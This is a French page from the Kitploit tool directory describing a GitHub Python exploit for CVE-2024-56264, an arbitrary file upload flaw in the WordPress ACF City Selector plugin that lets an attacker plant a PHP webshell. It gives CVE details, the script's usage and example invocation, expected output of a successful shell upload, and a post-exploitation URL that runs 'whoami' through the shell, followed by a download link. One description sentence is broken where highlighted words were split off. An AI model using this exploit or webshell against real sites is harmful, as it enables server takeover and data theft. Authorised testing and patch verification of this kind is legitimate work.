Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-56264 — Exploit Python pour CVE-2024-56264, une vulnérabilité de téléchargement arbitraire de fichiers dans le plugin WordPress ACF City Selector <=1.14.0, permettant l'exécution de code à distance via le téléchargement d'un webshell. | Kitploit
Outils/GitHubGitHub/dpakmrya/cve-2024-56264
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

Exploit Python pour CVE-2024-56264, une vulnérabilité de téléchargement arbitraire de fichiers dans le plugin WordPress ACF City Selector <=1.14.0, permettant l'exécution de code à distance via le téléchargement d'un webshell.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-56264

WordPress ACF City Selector - Exploit de téléchargement arbitraire de fichier (CVE-2024-56264)

Aperçu

Ce dépôt contient un exploit pour CVE-2024-56264, qui est une vulnérabilité de téléchargement arbitraire de fichier trouvée dans le plugin WordPress ACF City Selector (versions <= 1.14.0). Cette vulnérabilité permet à un attaquant de télécharger un fichier PHP malveillant (web shell) sur une instance WordPress vulnérable et d'exécuter des commandes arbitraires sur le serveur.

Détails CVE

  • CVE ID: CVE-2024-56264
  • Date de publication: 2 janvier 2025
  • Plugin concerné: ACF City Selector
  • Versions vulnérables: <= 1.14.0
  • Impact: Exécution de code à distance (RCE) via un téléchargement de fichier sans restriction

Description

Le plugin ACF City Selector ne parvient pas à valider correctement les fichiers téléchargés, permettant aux attaquants de et de télécharger . Une fois qu'un fichier PHP malveillant est téléchargé, un attaquant peut exécuter des commandes système à distance, entraînant une .

contourner les restrictions
des fichiers PHP arbitraires
compromission complète du serveur

Prérequis

📌 Dépendances

Assurez-vous que les éléments suivants sont installés avant d'exécuter le script :

  • Python 3.x
  • module requests (Installer en utilisant : pip install requests)

Vous pouvez installer toutes les dépendances requises en utilisant :

root@kitploit:~
pip install -r requirements.txt

🚀 Utilisation

Exécution de l'exploit :

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Exemple :

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Sortie attendue

En cas d'exploitation réussie, vous devriez voir :

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Post-exploitation

En cas de succès, accédez au shell téléchargé via :

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Cela permet l'exécution de commandes à distance sur le serveur.

⚠ Avertissement

Ce script est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée est illégale et peut entraîner de graves conséquences. L'auteur n'est pas responsable de toute mauvaise utilisation de cet exploit.

Télécharger l’outil